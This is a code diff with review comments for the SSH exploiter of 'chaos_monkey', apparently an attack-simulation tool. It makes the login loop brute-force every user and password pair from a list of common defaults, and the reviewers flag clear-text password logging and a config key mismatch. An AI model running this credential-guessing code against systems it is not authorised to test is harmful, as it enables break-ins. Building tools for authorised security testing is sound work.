diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py
index 659fade3d..99512cc53 100644
--- a/chaos_monkey/config.py
+++ b/chaos_monkey/config.py
@@ -194,7 +194,7 @@ class Configuration(object):
 psexec_passwords = ["Password1!", "1234", "password", "12345678"]
 # ssh exploiter
- ssh_user = "root"
+ ssh_users = ["root"]
 ssh_passwords = ["Password1!", "1234", "password", "12345678"]
 # rdp exploiter
diff --git a/chaos_monkey/example.conf b/chaos_monkey/example.conf
index 6fc61261f..cbaa0e42a 100644
--- a/chaos_monkey/example.conf
+++ b/chaos_monkey/example.conf
@@ -39,7 +39,7 @@
 "kill_file_path_linux": "/var/run/monkey.not",
- "kill_file_path_windows": "%windir%\monkey.not",
+ "kill_file_path_windows": "%windir%\\monkey.not",
 "dropper_try_move_first": false,
 "exploiter_classes": [
 "SSHExploiter",
@@ -69,7 +69,9 @@
 "serialize_config": false,
 "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
 "skip_exploit_if_file_exist": true,
- "ssh_user": "root",
+ "ssh_user": [
+ "root"
+ ],
 "local_network_scan": true,
 "tcp_scan_get_banner": true,
 "tcp_scan_interval": 200,
diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py
index 717fc9bae..c299062af 100644
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@@ -1,12 +1,13 @@
 import paramiko
-import monkeyfs
 import logging
+import time
+from itertools import product
+import monkeyfs
 from tools import build_monkey_commandline
 from exploit import HostExploiter
 from model import MONKEY_ARG
 from exploit.tools import get_target_monkey
 from network.tools import check_port_tcp
-import time
 __author__ = 'hoffer'
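Review bot: The second example.conf hunk keeps the key `"ssh_user"` and only changes its value to a list, while config.py renames the attribute to `ssh_users` and sshexec.py now reads `self._config.ssh_users`. How the loader treats a key with no matching attribute is not visible here, but a configuration built from this example would presumably leave `ssh_users` at its default instead of applying the listed value. The key should be renamed to match, `"ssh_users": [`. Existing deployed configurations that still carry the old `ssh_user` string are affected the same way, so a short note about the rename next to the `# ssh exploiter` comment in config.py would help operators.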
@@ -43,31 +44,34 @@ class SSHExploiter(HostExploiter):
 return False
 passwords = list(self._config.ssh_passwords[:])
- known_password = host.get_credentials(self._config.ssh_user)
- if known_password is not None:
- if known_password in passwords:
- passwords.remove(known_password)
- passwords.insert(0, known_password)
+ users = list(self._config.ssh_users)
+ known_passwords = [host.get_credentials(x) for x in users]
+ if len(known_passwords) > 0:
+ for known_pass in known_passwords:
+ if known_pass in passwords:
+ passwords.remove(known_pass)
+ passwords.insert(0, known_pass) #try first
+ user_pass = product(users,passwords)
 exploited = False
- for password in passwords:
+ for user, curpass in user_pass:
 try:
 ssh.connect(host.ip_addr,
- username=self._config.ssh_user,
- password=password,
+ username=user,
+ password=curpass,
 port=port,
 timeout=None)
 LOG.debug("Successfully logged in %r using SSH (%s : %s)",
- host, self._config.ssh_user, password)
- host.learn_credentials(self._config.ssh_user, password)
+ host, user, curpass)
+ host.learn_credentials(user, curpass)
 exploited = True
 break
 except Exception, exc:
 LOG.debug("Error logging into victim %r with user"
 " %s and password '%s': (%s)", host,
- user, curpass, exc)
+ user, curpass, exc)
 continue
 if not exploited:
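Review bot: Both `LOG.debug` calls in the login loop write the password in clear text, and the success message records a working user/password pair for the host; now that the loop runs over every user and password combination, the log accumulates more of them. Debug logs are commonly collected and retained with weaker access control than whatever `host.learn_credentials` stores, so the secret should be dropped from the messages, e.g. `LOG.debug("Successfully logged in %r using SSH as user %s", host, user)` with the matching change in the `except` branch. Separately, `known_passwords` presumably holds `None` for users with no stored credential (the removed code tested `is not None`), and `len(known_passwords) > 0` is true whenever `users` is non-empty, so that guard does nothing; a comment saying that `None` is filtered out by the `in passwords` test would make the intent clear. The enclosing method starts and ends outside this hunk.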